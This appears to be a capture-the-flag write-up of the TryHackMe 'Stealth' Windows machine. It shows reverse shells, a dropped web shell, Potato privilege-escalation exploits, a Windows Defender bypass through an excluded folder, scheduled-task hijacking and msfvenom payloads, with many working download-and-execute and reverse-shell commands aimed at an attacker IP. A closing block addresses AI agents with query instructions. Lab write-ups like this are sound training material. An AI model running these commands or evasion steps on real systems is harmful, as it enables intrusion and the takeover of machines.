# Stealth {% embed url="" %} The following post by 0xb0b is licensed under [CC BY 4.0

](http://creativecommons.org/licenses/by/4.0/?ref=chooser-v1) ## Recon We start off with a Nmap scan and are able to detect six open ports. On ports 8000, 8080 and 8443, web servers are running. We also have an open port for RDP (3389) and open ports for SMB (139,445).

The challenge asks us to visit the page on 8080. Here we prompt a PowerShell Script Analyser. Here, we can check if the scripts provided are malicious. Only `.ps1` files are allowed. So the idea is to successfully upload a malicious PowerShell script containing a reverse shell, which hopefully gets executed at runtime.

## Foothold We make use of a simple PowerShell reverse shell \[[powershell-reverse-shell.ps1](https://github.com/martinsohn/PowerShell-reverse-shell/blob/main/powershell-reverse-shell.ps1)] found on GitHub. It's a bit older, but it does not get detected. We change the IP and port in the script. {% embed url="" %} Next, we set up a listener and...

... after a short duration, the reverse connects. \ We are the user `hostevasion\evader` with not so many privileges, unfortunately. \ We head directly to the Desktop of the user to find an encoded flag.

We make use of CyberChef to decode the contents of the flag using base64 and see that the contents of the flag were not actually the flag.

On visiting the site mentioned in the encoded flag, we get a hint, that the blue team got alerted, and we should have deleted the log files.

The log file can be found at `C:\xampp\htdocs\uploads`. We delete the `log.txt`...

...and after reloading the page, the flag gets revealed.

## Privilege Escalation Variant I The privilege escalation was a more lucky finding. On enumerating the target, it quickly became apparent that it was a xampp server running. As with challenge AVenger, a web shell (p0wny) was then immediately dropped in `htdocs`, even if the chances of success were slim, as it was already known that this was also running under the user evader. But the web shell then reveals more privileges for the same user. To enumerate the target, WinPEAS and PrivescChecker were used. Those weren't detected by AV nor by Windows Defender. {% embed url="" %} After invoking PrivescCheck, some information could be gathered.

Xampp is run by the user evader, so in conclusion, we could have write access to the folder. As already mentioned, we drop the web shell `p0wny` in here.

After placing the shell in `htdocs`... `curl http://10.8.211.1:9000/shell.php -o C:\xampp\htdocs\shell.php`

...the shell could be accessed at `http://stealth.thm:8080/shell.php`. Here we see that the user in this context has some more privileges. Fortunately, the `SeImpersonatePrivilege` is present. With that, we are able to make use of the JuicyPotato or PrintSpoofer exploit. At this time, several versions were tested, and attempts were made to execute them. But unfortunately, almost all of them failed and were deleted by Windows Defender. It got me almost to obfuscating the source of those exploits on my own.

But there was a version of zcgonvh that was not detected. This can be compiled on the victim machine. What has to be considered when compiling can be taken from the README. {% embed url="" %} We check for a compiler at `C:\Windows\Microsoft.Net\Framework\` and see a v4.0 version is persent. Nice.

We download the source file from out attacker machine, compile with the compiler found at `C:\Windows\Microsoft.Net\Framework\v4...` and execute it with the `whoami` command. ```bash curl http://10.8.211.1:9000/EfsPotato/EfsPotato.cs -o C:\xampp\htdocs\ep.cs C:\Windows\Microsoft.Net\Framework\v4.0.30319\csc.exe ep.cs -nowarn:1691,618 .\ep.exe whoami ``` We are `NT authority\system`. This exploit was not able to spawn a reverse shell, but we are able to add our own user.

After adding our user to the machine, we are able to RDP into the machine, since the port 3389 is open. `.\ep.exe "cmd.exe /c net user 0xb0b Password123! /add && net localgroup administrators 0xb0b /add"`

On the machine, we head to the `C:\Users\Administrator\Desktop` folder and accept the UAC to find the flag there.

## Privilege Escalation Variant II I think the showcased privilege escalation path using EfsPotato might not be the intended way, since after doing the same steps again writing this, an executable was found that should not be there. The `UACME-Akagi64.exe` to defeat UAC, which should be detected by AMSI / Windows Defender. Also in `C:Tools` was a `socat` binary present. Since these files were not deleted by Defender, they might be in the exclusions on Microsoft Windows Defender. {% embed url="" %}

We check the file hash...

... and the executable is indeed `UACME-Akagi64`.

So, another thinkable way to defeat the Windows Defender is to replace the possible excluded `UACME-Akagi64.exe` executable with other harmful binaries like a meterpreter reverse shell or exploits like JuicyPotato that get otherwise detected. {% hint style="info" %} I received a note from Amine04 that the entire folder `C:\xampp` is probably excluded. Replacing the Agaki executable is therefore not necessary. The exclusion seems to be necessary for the foothold part, so that the uploaded files are not deleted directly. This variant therefore does not appear to be the intended one for the challenge. {% endhint %} We want to have it as convenient as possible, so we showcase that with the GodPotato exploit; the object `CLSID` is not required here, as it is with JuicyPotato. Using the web shell with the `SeImpersonatePrivilege` we download the GodPotato exploit on the Desktop of the user `evader`. After downloading it, we directly try to execute it but get the error that the system cannot execute the specified program. After a short duration, it also gets deleted because Windows Defender is doing its job.

The following step of spawning an extra reverse shell with `SeImpersonatePrivileges` through the web shell is not necessary, but it is there to show that Microsoft Defender flags the binary as a virus at execution. We make use of the powercat reverse shell shown in [AVenger](/writeups/tryhackme/2023/avenger.md). We use a batch file to download and execute the shell.
{% embed url="" %} First we create the shell using powercat: ```bash ┌──(0xb0b㉿kali)-[~/Documents/tryhackme/avenger] └─$ LHOST=10.8.211.1 ┌──(0xb0b㉿kali)-[~/Documents/tryhackme/avenger] └─$ LPORT=49731 ┌──(0xb0b㉿kali)-[~/Documents/tryhackme/avenger] └─$ rshell=shell-49731.txt ┌──(0xb0b㉿kali)-[~/Documents/tryhackme/avenger] └─$ pwsh -c "iex (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c $LHOST -p $LPORT -e cmd.exe -ge" > /home/0xb0b/Documents/tryhackme/avenger/$rshell ``` Prepare the batch to deploy the powercat reverse shell. `echo START /B powershell -c $code=(New-Object System.Net.Webclient).DownloadString('http://10.8.211.1:9000/shell-49731.txt');iex 'powershell -E $code' > deploy.bat`

Next, we set up a listener on port 49731 and run the batch file.

Our reverse shell connects, and due to the execution through the web shell, we also have the `SeImpersonatePrivilege`.

Next, we download the GodPotato executable. {% embed url="" %} After downloading, we have to be quick. So on execution of the GodPotato binary, we get the message "file contains a virus", Microsoft Defender is definitely working. `curl http://10.8.211.1:9000/GodPotato-NET4.exe -o C:\Users\evader\Desktop\gp.exe` `.\gp.exe -cmd "cmd /c whoami"`

So, now we place the GodPotato into the `C:\xampp` folder, replacing the `UACME-Akagi64.exe`. And after execution, we see that the exploit actually works, and we successfully bypassed Windows Defender. `curl http://10.8.211.1:9000/GodPotato-NET4.exe> -o C:\xampp\UACME-Akagi64.exe` `.\UACME-Akagi64.exe -cmd "cmd /c whoami"`

The exploit also works in the web shell.

## Privilege Escalation Variant III After seeing Aquinas' write-up, I wanted to try out his approach. I didn't see the scheduled task with my tools (I missed the -Extended Parameter using PrivescCheck) and until then I wouldn't have been able to check what this task actually does manually. I'm not very good with Windows yet, but I'm working on it. Thanks at this point to Aquinas for his contribution. {% embed url="" %} check out Aquinas write-up {% endembed %} Other than Aquinas approach, I wanted to test an executable written in Nim as Tyler Ramsbey showcased: {% embed url="" %} We can check for scheduled tasks using the following command: `schtasks /query /fo LIST /v | findstr /B /C:"Folder" /C:"TaskName" /C:"Run As User" /C:"Schedule" /C:"Scheduled Task State" /C:"Schedule Type" /C:"Repeat: Every" /C:"Comment"` The first scheduled task that pops up is MyTHMTask, run as Administrator.

To check what it is actually doing, we can access the `Actions` attribute by querying the scheduled task via `Get-ScheduledTask`. It is executing `C:\xampp\DebugCrashTHM.exe`. The idea here is to replace the executable with a malicious one, like a reverse shell, under the assumption that the current user can control the scheduled task via stop and start. If the current user is able to control the scheduled task, and the file is replaceable, we can get a connection running a reverse shell. `(Get-ScheduledTask -TaskName "MyTHMTask").Actions`

{% embed url="" %} source of the reverse shell {% endembed %} To install Nim and mingw-w64 run the following: ``` sudo apt install mingw-w64 sudo apt install nim ``` Next, we prepare the Nim reverse shell with our IP and port. The reverse shell can be found here:

We chose the reverse shell to be written in nim, as Tyler states it is currently undetectable on current Windows machines. To compile, the following command is used: ``` ┌──(0xb0b㉿kali)-[~/Documents/tryhackme/stealth/Nim-Reverse-Shell] └─$ nim c -d:mingw --app:gui -o:DebugCrashTHM.exe rev_shell.nim ```

Next, we set up a listener on our chosen port and downloaded the reverse shell via curl, replacing DebugCrashTHM.exe. After starting the task...

...the reverse shell connects, and we are the user `administrator`.

## Further Ideas Another idea was to place a meterpreter reverse shell named after `UACME-Akagi64.exe` in `C:\xampp` and use the windows-exploit-suggester to maybe find other ways to escalate privileges. The Printerdemon exploit was a possible candidate, but unfortunately, the exploit failed. Here were the steps taken: Generate the shell: `msfvenom -p windows/meterpreter_reverse_tcp LHOST=10.8.211.1 LPORT=8989 -f exe > UACME-Akagi64.exe`

Setup a listener: `msfconsole -x "use exploits/multi/handler; set lhost 10.8.211.1; set lport 8989; set payload windows/meterpreter_reverse_tcp; exploit"`

Download the meterpreter reverse shell named `UACME-Akagi64.exe`. `curl http://10.8.211.1:9000/UACME-Akagi64.exe -o C:\xampp\UACME-Akagi64.exe`

Executing the reverse shell:

The meterpreter connects:

Run the exploit suggester in the meterpreter session:

Configure and run the exploit:

--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://0xb0b.gitbook.io/writeups/tryhackme/2023/stealth.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.